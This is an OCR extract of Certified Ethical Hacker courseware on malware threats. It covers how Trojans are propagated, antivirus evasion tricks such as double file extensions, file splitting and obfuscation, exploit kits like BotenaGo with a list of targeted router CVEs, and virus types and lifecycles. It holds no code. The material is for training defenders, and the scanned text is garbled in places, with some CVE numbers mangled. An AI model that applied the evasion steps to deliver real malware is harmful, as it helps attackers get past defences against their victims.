@ Attackers use covert channels to deploy and hide malicious Trojans in an undetectable protocol @ Covert channels operate on a tunneling method and are mostly employed by attackers to evade firewalls that are deployed in the target network
@ Attackers can create covert channels using various tools such as Ghost Tunnel V2, ElectricFish, and Bachosens Trojan Covert Channel through TCP/UDP
> q Attacker
Module 07 Page 1010
Malicious Server
Firewall
v
Target Server
Attack Target Services
Ethical Hacking and Countermeasures Copyright © by E6-COl All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
CEH
Propagating and Deploying a Trojan (Cont’d) Deploy a Trojan through Proxy Servers ‘@
Attackers compromise several computers using a Trojan proxy and
start using them as hidden proxy servers
@ The attackers have full control over the proxy victim’s systemsand can launch attacks on other systems from an affected user’s network ‘@
Attackers use this to anonymously propagate and deploy the Trojan on to the target computer
@
Ifthe authorities detect illegal activity, the footprints lead to innocent users
‘@
Thousands of machines on the Internet are infected with proxy servers
ae ae
3
Compromised Proxy Servers
Internet
in?
Target Company
CEH
Propagating and Deploying a Trojan (Cont’d) Deploy a Trojan through USB/Flash Drives
|| |@ Attackers drop the USB drives on the pathway and wait for random victims to pick them up | | | |@ Once the USB drive is picked up and inserted in the target system by the innocent victim, the Trojan is propagated onto the system and is automatically executed, thus infecting and compromising the system and network
L
4
Malicious Server
[2]
‘Attacker
Malicious USB
e
Victim Finds USB
Module 07 Page 1011
:z a
=
Inserts USB
war
-z
=} >
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
Propagating and Deploying a Trojan (Cont'd)
CE H
Techniques for Evading Antivirus Software
@ Break the Trojan file into multiple pieces and zip them as a single file @ ALWAYS write your own Trojan, and embed it into an application @ Change the Trojan’s syntax:
@ Convertan EXE to VB script © Change .EXE extension to .DOC.EXE, .PPT.EXE or .PDF.EXE (Windows hides “known extensions”by default, so it shows up only as .DOC, .PPT and .PDF)
@ Change the content of the Trojan using hex editor and also change the checksum and encrypt the file ‘@
Never use Trojans downloaded from the web (antivirus can detect these easily)
Propagating and Deploying a Trojan After creating a Trojan and employing a dropper/downloader, wrapper, and crypter, the attacker must transfer the package and deploy it on the target machine. The attacker can use the following techniques to propagate the Trojan package to the target machine: =
Deploy a Trojan through emails
=
Deploy a Trojan through covert channels
=
Deploy a Trojan through proxy servers
=
Deploy a Trojan through USB/flash Drives
Deploy a Trojan through Emails
A Trojan is the means by which an attacker can gain access to the victim's system. To gain control over the victim's machine, the attacker creates a Trojan server and then sends an email that lures the victim into clicking on a link provided within the email. As soon as the victim clicks the malicious link sent by the attacker, it connects directly to the Trojan server. The Trojan server then sends a Trojan to the victim system, which undergoes automatic installation on the victim’s machine and infects it. As a result, the victim’s device establishes a connection with the attack server unknowingly. Once the victim connects to the attacker's server, the attacker can take complete control of the victim’s system and perform any action. If the victim carries out an online transaction or purchase, then the attacker can easily steal sensitive information such as the victim’s credit card details and account information. In addition, the attacker can use the victim's machine to launch attacks on other systems. The Trojan may infect computers when users open an email attachment that installs the Trojan on their computers, which might serve as a backdoor for criminals to access the system later. Module 07 Page 1012
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
Major Trojan Attack Paths:
© User clickson the malicious link © User opens malicious email attachments
Attacker Attacker installs
the Trojan, infecting his
.
Trojan Server
Figure 7.30: Propagating and deploying Trojan through email
Deploy a Trojan through Covert Channels “Overt” refers to something explicit, obvious, or evident, whereas “covert” refers to something secret, concealed, or hidden.
An overt channel is a legal channel for the transfer of data or information in a company network, and it works securely to transfer data and information. On the contrary, a covert channel is an illegal, hidden path used to transfer data from a network. The table below lists the primary differences between overt and covert channels:
Overt Channel
Covert Channel
A legitimate communication path within a computer system or
A channel that transfers information within a computer system or network in a way that
Its idle components can be exploited to create a covert channel
An example of a covert channel is the communication between a Trojan and its command-and-control center
network for the transfer of data
violates the security policy
Table 7.2: Comparison between the overt channel and covert channel
Covert channels are methods used by attackers to deploy and hide malicious Trojans in an undetectable protocol. They rely on a technique called tunneling, which enables one protocol to transmit over the other. This makes it an attractive mode of transmission for a Trojan, because an attacker can use the covert channel to install a backdoor on the target machine. Covert channels are mostly employed by attackers to evade antivirus scanners and firewalls deployed in the target network. Attackers can create covert channels using various tools such as Ghost Tunnel V2, ElectricFish, and Bachosens Trojan. These tools enable attackers to create covert tunnels with protocols such as DNS, SSH, ICMP, and HTTP/S, to deploy Trojans and perform data exfiltration.
Module 07 Page 1013 :
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
Covert Channel through TCP/UDP
Leone E Attacker
>(-Jex ee > V3
Malicious Server
_Firewalll
Target Server
Attack Target Services
Figure 7.31: Propagating and deploying Trojan through covert channels
Deploy a Trojan through Proxy Servers A Trojan
proxy is usually a standalone application that allows remote attackers to use the
victim’s computer as a proxy to connect to the target machine. Attackers compromise several computers and start using them as hidden proxy servers. Attackers have full control over the proxy victim’s system and can launch attacks on other systems in the affected user’s network. Attackers use this strategy to anonymously propagate and deploy the Trojan on the target computer. If the authorities detect illegal activity, the footprints lead to innocent users and not to the attackers, potentially resulting in legal hassles for the victims, who are ostensibly responsible for their network or any attacks launched from them. Thousands of machines on the Internet are infected with proxy servers. Attackers can also employ proxy server Trojans such as Linux.Proxy.10, Proxy Trojan, or Pinkslipbot (Qbot), which can automatically create proxies and be used to perform malicious activities.
Attacker
Compromised Proxy Servers
Internet
Target Company
Figure 7.32: Propagating and deploying Trojan through proxy servers
Deploy a Trojan through USB/Flash Drives An attacker can also transfer the Trojan package onto a USB drive and trick the victim into using the USB drive on the target system. Sometimes, attackers just drop a USB drive and wait for a random victim to pick it up. Once the USB drive is picked up and inserted into the target system by the innocent victim, the Trojan is propagated on the system by the drop or download method, depending on the type of packaging technique used by the attacker. After propagating to the victim’s machine, the Trojan is automatically executed on the target system, thereby infecting and compromising the system and network. Malicious Server
Attacker
Drops
Malicious USB
Victim
Finds USB
Inserts USB in system
Drop and Execute Trojan
Compromise Victim’s System
Figure 7.33: Propagating and deploying Trojan through USB
Module 07 Page 1014
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
Techniques for Evading Antivirus Software Sometimes, various types of antivirus scanners are deployed in the target network, and these antivirus scanners do not allow the propagation or deployment of random or malicious packages. Hence, propagating and deploying a Trojan stealthily is one of the important tasks of an attacker. The various techniques that can be used by attackers to make malware such as Trojans, viruses, and worms undetectable by antivirus applications are listed below. 1.
Break the Trojan file into multiple pieces and zip them as a single file.
2.
Always write your Trojan and embed it into an application (an antivirus program fails to recognize new Trojans, as its database does not contain the proper signatures). Change the Trojan’s syntax: o
Convert an EXE to VB script
o
Change the .EXE extension to .DOC, .EXE, .PPT, .EXE, or .PDF.EXE (Windows hides “known extensions” by default; hence, it shows up only as .DOC, .PPT, .PDF, etc.)
enous
Change the content of the Trojan using a hex editor. Change the checksum and encrypt the file. Never use Trojans downloaded from the web (antivirus software detects these easily). Use binder and splitter tools that can change the first few bytes of the Trojan programs. Perform code obfuscation or morphing. Morphing is done to prevent program from differentiating between malicious and harmless programs.
Module 07 Page 1015
the
antivirus
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
Exploit Kits
CE H
@ Anexploitkit or crimeware toolkitis a platformto deliver exploits and payloads such as Trojans, spywares, backdoors, bots, and buffer overflow scripts to the target system
@ Exploitkits come with pre-written exploit codes and therefore can be easily used by an attacker, who is not an IT or security expert
Legitimate
fz Legitimate Website
Compromised Web Server Exploit kit gathers information on the victit and delivers the exploit
te aeserverra hosting the exploit pack landing page
Exploit Kits (Cont’d) BotenaGo jotenaGo
op
=
(a —
Exploit Kit Exploit Pack Server _ Landing Page
CEH
@ The BotenaGo exploit kit written in the Go scripting language contains over 30 variants of exploits, | which make it capable of attacking millions of loT and routing devices worldwide @ Using BotenaGo, attackers initiate the exploitation process by droppinga backdoor into the victim's device through port 31412
Exploit Kits Lord
Underminer Exploit kit RIG Exploit kit
Magnitude Angler Neutrino
Sundown
—=
| || | || | || | || | ] B | || | || | || | || | ||
‘
1 ||
) bance vedo aoe i ise ae
|| ||
|| | ||
secrty vente on
|| ||
|| ||
| Al Rights Reserved, Reproduction i
Exploit Kits An exploit kit or crimeware toolkit is used to exploit security loopholes found in software applications such as Adobe Reader and Adobe Flash Player, by distributing malware such as spyware, viruses, Trojans, worms, bots, backdoors, buffer overflow scripts, or other payloads to the target system. Exploit kits come with pre-written exploit code. Thus, they are easy to use for an attacker who is not an IT or security expert. They also provide a user-friendly interface to track the infection statistics as well as a remote mechanism to control the compromised Module 07 Page 1016
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
system. Using exploits kits, an attacker can target browsers, programs that are accessible using browsers, zero-day vulnerabilities, and exploits updated with new patches instantly. Exploit kits are used against users running insecure or outdated software applications on their systems. Legitimate website hosted
on compromised web server Victim
Legitimat
>| .
‘we site re
Compromised
jepsite
r
Web Server
Exploit kit gathers
information on the victim and delivers the exploit
server hosting the exploit pack landing page
Exploit Kit Server
Exploit Pack Landing Page
Figure 7.34: Process of exploitation using exploit kits
The diagram above shows the general procedure for an exploit kit; the process of exploiting a machine might vary depending on the exploit kit used: =
The victim visits a legitimate website that is hosted on the compromised web server.
=
The victim is redirected through various intermediary servers.
=
The victim unknowingly lands on an exploit kit server hosting the exploit pack landing
=
The exploit kit gathers information on the victim, based on which exploit and delivers it to the victim’s system.
=
If the exploit succeeds, a malware program is downloaded and executed on the victim’s
page.
it determines the
system.
Exploit Kits =
BotenaGo Exploit Kit
The BotenaGo exploit kit written in the Go scripting language contains over 30 variants of exploits and is cable of attacking millions of loT and routing devices worldwide. BotenaGo was first discovered in November 2021 and observed as Mirai botnet malware by antivirus software. Using BotenaGo, attackers initiate the exploitation process by placing a backdoor in the victim device through port 31412 by sending a GET request and listens for the victim IP as the response through port 19412. After successfully embedding a backdoor in the victim device, attackers can explore the device using exploit functions that are preconfigured in the source code. BotenaGo is successfully being used by attackers in distributing DDoS functionalities by spreading payloads to victim devices.
Module 07 Page 1017 :
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
Features:
o
No active communication with the command-and-control unit during exploitation
o
Exploits based on exploitation function mapping
o
Exploits up to 33 vulnerabilities in the initialization phase
co
Launches Mirai malware on the victim device through links
The table below lists some of the vulnerabilities that can be exploited by BotenaGo. Vulnerability
Affected devices
CVE-20208515
DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta, and Vigor300B 1.3.3_Beta, 1.4.2.1_Beta, and 1.4.4 Beta devices
CVE-20152051
D-Link DIR-645 Wired/Wireless Router Rev. Ax with firmware 1.04b12 and earlier
CVE-20161555
Netgear WN604 before 3.3.3 and WN802Tv2, WNAP210v2, WNAP320, WNDAP350, WNDAP360, and WNDAP660 before 3.5.5.0
aaa
NETGEAR DGN2200 devices with firmware version 10.0.0.50
CVE-20166277
NETGEAR R6250 before 1.0.4.6.Beta, R6400 before 1.0.1.18.Beta, R6700 before 1.0.1.14.Beta, R6900, R7000 before 1.0.7.6.Beta, R7100LG before 1.0.0.28.Beta, R7300DST before 1.0.0.46.Beta, R7900 before 1.0.1.8.Beta,
CVE-201810561, CVE2018-10562
R8000 before 1.0.3.26.Beta, D6220, D6400, D7000 | GPON
home routers
CVE-20133307
. . Linksys X3000 1.0.03 build 001
CVE-20209377
. D-Link DIR-610
CVE-201611021
. . D-Link DCS-930L devices before 2.12
CVE-201810088
. . XiongMai uc-httpd 1.0.0
Vulnerability
Affected devices
aoe
Comtrend VR-3033 DE11-416SSG-C01_R02.A2pvl042j1.d26m
CVE-20135223
. D-Link DSL-2760U Gateway
Module 07 Page 1018
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
CVE-20208958
Guangzhou 1GE ONU V2801RW 1.9.1-181203 through 2.9.0-181024 and V2804RGW 1.9.1-181203 through 2.9.0-181024
CVE-201919824
TOTOLINK Realtek SDK based routers; this affects A3002RU through 2.0.0, A702R through 2.1.3, N301RT through 2.1.6, N302R through 3.4.0, N300RT through 3.4.0, N200RE through 4.0.0, N150RT through 3.4.0, and N100RE through 3.4.0.
CVE-202010987
. Tenda AC15 AC1900 version 15.03.05.19
CVE-20209054
Multiple ZyXEL network-attached storage (NAS) devices running firmware version 5.2; affected products include NAS326 before firmware V5.21(AAZF.7)CO, NAS520 before firmware V5.21(AASZ.3)CO, NAS540 before firmware V5.21(AATB.4)CO, NAS542 before firmware V5.21(ABAG.4)CO; ZyXEL has made firmware updates available for NAS326, NAS520, NAS540, and NAS542 devices; affected models that are at end-of-support are NSA210, NSA220, NSA220+, NSA221, NSA310,
NSA310S, NSA320, NSA320S, NSA325, and NSA325v2
CVE-2017-
18368 CVE-2014-
2321
ea
ZyXEL P660HN-T1A v1 TCLinux Fw $7.3.15.0 v001 / 3.40(ULM.0)b31 router
distributed by TrueOnline ZTE F460 and F660 cable modems
NETGEAR DGN2200 devices with firmware version 10.0.0.50 Table 7.3: CVEs for the BotenaGo exploit kit
A -™
© 4 securty vendors
flagged this this fil eas
malicious
A
c2fer4d2edb260614d5azte90cc4c142
DETECTION
DETAILS
RELATIONS
= CONTENT
-—SUBMISSIONS
COMMUNITY
‘Security vendors’ analysis on
undetected
Ad-Aware
D)
Underecte:
Figure 7.35: Screenshot of RIG Exploit Kit
Module 07 Page 1019
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
The following are some additional exploit kits that attackers can use to propagate and deploy Trojans: =
Lord
=
Angler
=
Underminer Exploit Kit
=
Neutrino
=
RIG Exploit kit
=
Terror
=
Magnitude
=
Sundown
Module 07 Page 1020
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
CEH
LO#04: Explain Viruses and Worm, Their Types, and How They Infect Files
Copyright © by
Al RightsReserved, Reproduction
i Strictly Prohibited.
Virus and Worm Concepts This section introduces you to various concepts related to viruses and worms. In addition, it discusses the life stages of a virus and the working of a virus. It also explores why people create computer viruses, indications of a virus attack, virus hoaxes, fake antivirus tools, and
ransomware.
Furthermore, it highlights different types of viruses, categorized by their origin, techniques used to infect target systems, the types of files they infect, where they hide, the sort of damage they cause, the type of OS they work on, and so on. It also deals with computer worms, discusses the difference between worms and viruses, and explores worm makers.
Module 07 Page 1021 :
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
Introduction to Viruses
CE H
@ A virus is a self-replicating program that produces its own copy by attaching itself to another program, computer boot sector or document
@ Viruses are generally transmitted through file downloads, infected disk/flash drives, and as email attachments @ Indications of a virus attackinclude constant antivirus alerts, suspicious hard drive activity, lack of storage space, unwanted pop-up windows, etc. Characteristics of Viruses
© Infect other programs © Transform themselves ©
Encryptthemselves
& Alterdata
and programs © Corruptfiles © Self-replicate
Purpose of Creating Viruses
Inflict damage on competitors Financial benefits Vandalism Play pranks
Research projects
Cyber terrorism
Distribute political messages
Damage networksor computers Gain remote access toa victim’s computer
Introduction to Viruses Viruses are the scourge of modern computing. Computer viruses have the potential to wreak havoc on both business and personal computers. The lifetime of a virus depends on its ability to reproduce itself. Therefore, attackers design every virus code such that the virus replicates itself n times. A computer virus is a self-replicating program that produces its code by attaching copies of itself to other executable code and operates without the knowledge or consent of the user. Like a biological virus, a computer virus is contagious and can contaminate other files; however, viruses can infect external machines only with the assistance of computer users. Some viruses affect computers as soon as their code is executed; other viruses remain dormant until a pre-determined logical circumstance is met. Viruses infect a variety of files, such as overlay files (.OVL) and executable files (.EXE, SYS, .COM, or .BAT). They are transmitted through file downloads, infected disk/flash drives, and email attachments.
Characteristics of Viruses The performance of a computer is affected by a virus infection. This infection can lead to data loss, system crash, and file corruption. Some of the characteristics of a virus are as follows: =
Infects other programs
=
Transforms itself
=
Encrypts itself
=
Alters data
Module 07 Page 1022
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
=
Corrupts files and programs
=
Replicates itself
Purpose of Creating Viruses
Attackers create viruses with disreputable motives. Criminals create viruses to destroy a company’s data, as an act of vandalism, or to destroy a company’s products; however, in some cases, viruses aid the system. An attacker creates a virus for the following purposes: =
Inflict damage on competitors
=
Realize financial benefits
=
Vandalize intellectual property
=
Play pranks
=
Conduct research
=
Engage in cyber-terrorism
=
Distribute political messages
=
Damage network or computers
=
Gain remote access to the victim's computer
Indications of Virus Attack Indications of virus attacks arise from abnormal activities. Such activities reflect the nature of a virus by interrupting the regular flow of a process or a program. However, not all bugs created contribute toward attacking the system; they may be merely false positives. For example, if the system runs slower than usual, one may assume that a virus has infected the system; however, the actual reason might be program overload. An effective virus tends to multiply rapidly and may infect some machines in a short period. Viruses can infect files on the system, and when such files are transferred, they can infect machines of other users who receive them. A virus can also use file servers to infect files. When a virus infects a computer, the victim or user will be able to identify some indications of the presence of virus infection. Some indications of computer virus infection are as follows: =
Processes require more resources and time, resulting in degraded performance
=
Computer beeps with no display
=
Drive label changes and OS does not load
=
Constant antivirus alerts
=
Computer freezes frequently or encounters an error such as BSOD
=
Files and folders are missing
Module 07 Page 1023
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
=
Suspicious hard drive activity
=
Browser window “freezes”
=
Lack of storage space
=
Unwanted advertisements and pop-up windows
Module 07 Page 1024
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
C'EH
Stages of Virus Lifecycle Design Replication Launch Detection
Incorporation
Execution of the damage routine
| Developing virus code using programming languages or construction kits | Virus replicates itself for a period within the target system and then spreads itself | It gets activated when the user performs certain actions such as running infected programs | Avirusis identified as a threat infecting target systems
| Antivirus software developers assimilate defenses against the virus
the virus threats and eliminate | Users install antivirus updates
Stages of Virus Lifecycle The virus lifecycle includes the following six stages from origin to elimination. 1.
Design: Development of virus code using programming languages or construction kits.
2.
Replication: The virus replicates for a period within the target system and then spreads itself.
3.
Launch: The virus is activated when the user performs specific actions such as running an infected program.
4.
Detection: The virus is identified as a threat infecting target system.
5.
Incorporation: Antivirus software developers assimilate defenses against the virus.
6.
Execution of the damage routine: Users install antivirus updates and eliminate the virus threats.
Module 07 Page 1025
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
Working of Viruses
C iE H
Infection Phase ‘@
Attack Phase
Inthe infection phase, the virus replicates itself and
‘@ Viruses are programmed with trigger events to
activate and corrupt systems
attaches to a .exe file in the system Before
After
Infection
Infection
-EXE File
-EXE File
File Header Cp
File Header TP Jeot
‘Start of Program|
aad
gefep Start of Program
End of Progam
lean
‘@
End of Program rx!
infect only when a certain predefined condition ismet
such as a user’s specifictask, a day, time, or a specific event
Unfragmented File Before Attack i B File: ile: A File: den
Page: 1, Page:2 ee z
Page:2
Page:3
o Fragmented Due to Virus Attack File
Virus Infected File
ne
Some viruses infect each time they are run, and others
Page:1 File:A
Page:1 | Page:3.—«Page:2_—-Page:2 Page:3 File:BFile:B File:A_—File:B_—File:A
x
Working of Viruses Viruses can attack a target host’s system using a variety of methods. They can attach themselves to programs and transmit themselves to other programs through specific events. Viruses need such events to take place, as they cannot self-start, infect hardware, or transmit themselves using non-executable files. “Trigger” and “direct attack” events can cause a virus to activate and infect the target system when the user triggers attachments received through email, websites, malicious advertisements, flashcards, pop-ups, and so on. The virus can then attack the system’s built-in programs, antivirus software, data files, system startup settings, etc.
Viruses have two phases: the infection phase and the attack phase.
=
Infection Phase Programs modified by a virus infection can enable virus functionalities to run on the system. The virus infects the target system after it is triggered and becomes active upon the execution of infected programs, because the program code leads to the virus code. The two most important factors in the infection phase of a virus are as follows: o
Method of infection
o
Method of spreading
A virus infects a system in the following sequence: o.
The virus loads itself into memory and checks for an executable on the disk.
o
The virus appends malicious code to a legitimate program without the permission or knowledge of the user.
oO.
The user is unaware of the replacement and launches the infected program.
Module 07 Page 1026
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
o
The execution of the infected program also infects other programs in the system.
o
The above cycle continues
system.
until the user realizes that there is an anomaly
in the
Apparently, the user unknowingly triggers and executes the virus for it to function. There are many ways to execute programs while the computer is running. For example, if the user installs any software tool, the setup program calls various built-in subprograms during extraction. If a virus program already exists, it can be activated with this type of execution, and the virus can also infect additional setup programs. Specific viruses infect in different ways, such as o A
o
file virus infects by attaching itself to an executable system application program. Potential targets for virus infections are as follows: e
Source code
¢
Batch files
©
Script files
Boot sector viruses execute their code before the target PC is booted.
Viruses spread in a variety of ways. There are virus programs that infect and keep spreading every time the user executes them. Some virus programs do not infect programs when first executed. They reside in a computer’s memory and infect programs later. Such virus programs wait for a specified trigger event to spread at a later stage. Therefore, it is difficult to recognize which event might trigger the execution of a dormant virus. As illustrated in the figure below, the .EXE file’s header, when triggered, executes and starts running the application. Once this file is infected, any trigger event from the file’s header can activate the virus code along with the application program immediately after executing it. The most popular methods by which a virus spreads are as follows: o.
Infected files: A virus can infect a variety of files.
o.
File-sharing services: A virus can take advantage of file servers to infect files. When unsuspecting users open the infected files, their machines also become infected.
o
DVDs and other storage media: When infected storage media such as DVDs, flash drives, and portable hard disks are inserted into a clean system, the system gets infected.
©
Malicious attachments and downloads: A virus spreads if a malicious attachment sent via email is opened or when apps are downloaded from untrusted sources.
Module 07 Page 1027 :
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
Before Infection
After Infection
-EXE File
{ sOXE
File Header
File Header
IP
IP
4...) Dd start of Program|
L_J Clean File
&
z77}p Startof Program
End of Program|
Virus Jump
End of Program
=>":
{
Virus Infected File
Figure 7.36: Infection Phase
=
Attack Phase Once viruses spread throughout the target system, they start corrupting the files and programs of the host system. Some viruses can trigger and corrupt the host system only after the triggering event is activated. Some viruses have bugs that replicate themselves and perform activities such as deleting files and increasing session time. Viruses corrupt their targets only after spreading as intended by their developers. Most viruses that attack target systems perform the following actions: o.
Delete files and alter the content of data files, slowing down the system
o
Perform tasks animations
not
related
to applications,
such
as playing
music
and
creating
Unfragmented File Before Attack File: B
File: A
Page:1
Page:2_—sPage:3
File Fragmented Due to Virus Attack
Figure 7.37: Attack Phase
The figure shows two files, A and B. Before the attack, the two files are located one after the other in an orderly manner. Once a virus code infects the file, it alters the position of the files placed consecutively, leading to inaccuracy in file allocations and causing the Module 07 Page 1028
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
system to slow down as the user tries to retrieve the files. In the attack phase: o
Viruses execute upon triggering specific events
o
Some viruses execute and corrupt via built-in bug programs after being stored in the host’s memory
©
The latest and most advanced viruses conceal their presence, attacking only after thoroughly spreading through the host
Module 07 Page 1029 :
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
How does a Computer
1]
.
Get Infected by Viruses?
. the latest antivirus application Not running
When a user accepts files and downloads without properly checkingthe source
Opening infected e-mail attachments
B
Installing pirated software
Not updating and not installing new versions of plug-ins
|
CE H
Clicking malicious online ads
Using portable media
8 |
.
Connecting to untrusted networks Copyright © by
How does a Computer Get Infected by Viruses? To infect a system, first,
a virus has to enter it. Once the user downloads and installs the virus
from any source and in any form, it replicates itself to other programs. Then, the virus can infect the computer in various ways, some of which are listed below: Downloads: Attackers incorporate viruses in popular software programs and upload them to websites intended for download. When a user unknowingly downloads this infected software and installs it, the system is infected. Email attachments: Attackers usually send virus-infected files as email attachments to spread the virus on the victim’s system. When the victim opens the malicious attachment, the virus automatically infects the system. Pirated software:
Installing cracked versions of software
(OS, Adobe,
Microsoft Office,
etc.) might infect the system as they may contain viruses. Failing to install security software: With the increase in security parameters, attackers are designing new viruses. Failing to install the latest antivirus software or regularly update it may expose the computer system to virus attacks. Updating software: If patches are not regularly installed when released by vendors, viruses might exploit vulnerabilities, thereby allowing an attacker to access the system. Browser: By default, every browser comes with built-in security. An incorrectly configured browser could result in the automatic running of scripts, which may, in turn, allow viruses to enter the system. Firewall: Disabling the firewall will compromise the security of network traffic and invite viruses to infect the system. Module 07 Page 1030
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Malware Threats
Exam 312-50 Certified Ethical Hacker
=
Pop-ups: When the user clicks any suspicious pop-up by mistake, the virus hidden behind the pop-up enters the system. Whenever the user turns on the system, the installed virus code will run in the background.
=
Removable media: When a healthy system is associated with virus-infected removable media (e.g., CD/ DVD, USB drive, card reader), the virus spreads the system.
=
Network access: Connecting to an untrusted Wi-Fi network, leaving Bluetooth ON, or permitting a file sharing program that is accessed openly will allow a virus to take over the device.
=
Backup and restore: Taking a backup of an infected file and restoring it to a system infects the system again with the same virus.
=
Malicious online ads: Attackers post malicious online ads by embedding malicious code in the ads, also known as malvertising. Once users click these ads, their computers get infected.
=
Social Media: People tend to click on social media sites, including malicious links shared by their contacts, which can infect their systems.
Module 07 Page 1031 :
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
Types of Viruses @
CEH
Viruses are categories according to their functioning and targets
\@ Some of the example includes:
System or Boot Sector Virus
Polymorphic Virus
Web Scripting Virus
File and Multipartite Virus
Metamorphic Virus
Email and Armored Virus
Macro and Cluster Virus
Overwriting File or Cavity Virus
Add-on and Intrusive Virus
Stealth/Tunneling Virus
Companion/Camouflage Virus
Direct Action or Transient Virus
Encryption Virus
Shell and File Extension Virus
Terminate & Stay Resident Virus
Sparse Infector Virus
FAT and Logic Bomb Virus
Types of Viruses Computer viruses are malicious software programs written by attackers to gain unauthorized access to a target system. Thus, they compromise the security of the system as well as its performance. For any virus to corrupt a system, it has to first associate its code with executable code. It is important to understand how viruses: =
Add themselves to the target host’s code
=
Choose to act upon the target system
Viruses are categories according to their functioning and targets. Some of the most common types of computer viruses that adversely affect the security of systems are listed below: 1.
System or Boot Sector Virus
10. Metamorphic Virus
2.
File Virus
11. Overwriting File or Cavity Virus
3.
Multipartite Virus
12. Companion Virus/Camouflage Virus
4.
Macro Virus
13. Shell Virus
5.
Cluster Virus
14. File Extension Virus
6.
Stealth/Tunneling Virus
15. FAT Virus
7.
Encryption Virus
16. Logic Bomb Virus
8.
Sparse Infector Virus
17. Web Scripting Virus
9.
Polymorphic Virus
18. Email Virus
Module 07 Page 1032
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
19. Armored Virus
22. Direct Action or Transient Virus
20. Add-on Virus
23. Terminate
(TSR)
21. Intrusive Virus
and
Stay
Resident
Virus
System or Boot Sector Viruses The most common targets for a virus are the system sectors, which include the master boot record (MBR) and the DOS boot record system sectors. An OS executes code in these areas while booting. Every disk has some sort of system sector. MBRs are the most virus-prone zones because if the MBR is corrupted, all data will be lost. The DOS boot sector also executes during system booting. This is a crucial point of attack for viruses. The system sector consists of only 512 bytes of disk space. Therefore, system sector viruses conceal their code in some other disk space. The primary carriers of system or boot sector viruses are email attachments and removable media (USB drives). Such viruses reside in memory. Some sector viruses also spread through infected files; these are known as multipartite viruses. A boot sector virus moves MBR to another location on the hard disk and copies itself to the original location of MBR. When the system boots, first, the virus code executes and then control passes to the original MBR. Before Infection
OnmSaa | |a li Cd
After Infection
Figure 7.38: Working of system and boot sector virus
=
Virus Removal System sector viruses create the illusion that there is no virus on the system. One way to deal with this virus is to avoid the use of the Windows OS and switch to Linux or Mac, because Windows is more prone to such attacks. Linux and Macintosh have built-in safeguards for protection against these viruses. The other approach is to periodically perform antivirus checks.
